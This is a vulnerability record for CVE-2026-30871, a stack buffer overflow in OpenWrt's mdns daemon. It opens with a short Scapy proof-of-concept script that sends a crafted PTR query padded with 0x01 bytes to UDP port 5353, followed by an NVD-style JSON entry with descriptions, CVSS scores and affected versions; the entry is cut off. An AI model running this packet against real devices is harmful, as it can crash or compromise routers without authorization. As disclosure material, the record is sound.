CVE-2026-30871

from scapy.all import * # Define the target IP and Port target_ip = "192.168.1.1" target_port = 5353 # Craft a malicious PTR query # The payload contains non-printable characters (0x01) that dn_expand expands to \001 # This expansion causes the overflow in the 256-byte stack buffer. malicious_name = b"\x01" * 100 + b".in-addr.arpa" # Construct DNS packet dns_pkt = IP(dst=target_ip)/UDP(dport=target_port)/DNS(rd=1, qd=DNSQR(qtype=12, qname=malicious_name)) # Send the packet send(dns_pkt) print(f"Sent malicious PTR query to {target_ip}")

{"cve": {"id": "CVE-2026-30871", "sourceIdentifier": "[email protected]", "published": "2026-03-19T22:16:31.633", "lastModified": "2026-03-24T14:07:06.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenWrt Project is a Linux operating system targeting embedded devices. In versions prior to 24.10.6 and 25.12.1, the mdns daemon has a Stack-based Buffer Overflow vulnerability in the parse_question function. The issue is triggered by PTR queries for reverse DNS domains (.in-addr.arpa and .ip6.arpa). DNS packets received on UDP port 5353 are expanded by dn_expand into an 8096-byte global buffer (name_buffer), which is then copied via an unbounded strcpy into a fixed 256-byte stack buffer when handling TYPE_PTR queries. The overflow is possible because dn_expand converts non-printable ASCII bytes (e.g., 0x01) into multi-character octal representations (e.g., \\001), significantly inflating the expanded name beyond the stack buffer's capacity. A crafted DNS packet can exploit this expansion behavior to overflow the stack buffer, making the vulnerability reachable through normal multicast DNS packet processing. This issue has been fixed in versions 24.10.6 and 25.12.1."}, {"lang": "es", "value": "El Proyecto OpenWrt es un sistema operativo Linux dirigido a dispositivos embebidos. En versiones anteriores a la 24.10.6 y 25.12.1, el demonio mdns tiene una vulnerabilidad de desbordamiento de búfer basado en pila en la función parse_question. El problema se activa por consultas PTR para dominios DNS inversos (.in-addr.arpa y .ip6.arpa). Los paquetes DNS recibidos en el puerto UDP 5353 son expandidos por dn_expand en un búfer global de 8096 bytes (name_buffer), que luego se copia mediante un strcpy sin límites en un búfer de pila fijo de 256 bytes al manejar consultas TYPE_PTR. El desbordamiento es posible porque dn_expand convierte bytes ASCII no imprimibles (p. ej., 0x01) en representaciones octales de múltiples caracteres (p. ej., \\001), inflando significativamente el nombre expandido más allá de la capacidad del búfer de pila. Un paquete DNS manipulado puede explotar este comportamiento de expansión para desbordar el búfer de pila, haciendo que la vulnerabilidad sea alcanzable a través del procesamiento normal de paquetes DNS multicast. Este problema ha sido corregido en las versiones 24.10.6 y 25.12.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.5, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.10.6", "matchCriteriaId": "12B5818C-BB4D-4486-9C53-7FCA8EF2EDA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:*:*:*:*:*:*:*:*", "versionStartIncluding": "25.12.0", "versionEndExcluding": "25.12.1", "matchCriteriaId": " ... (truncated)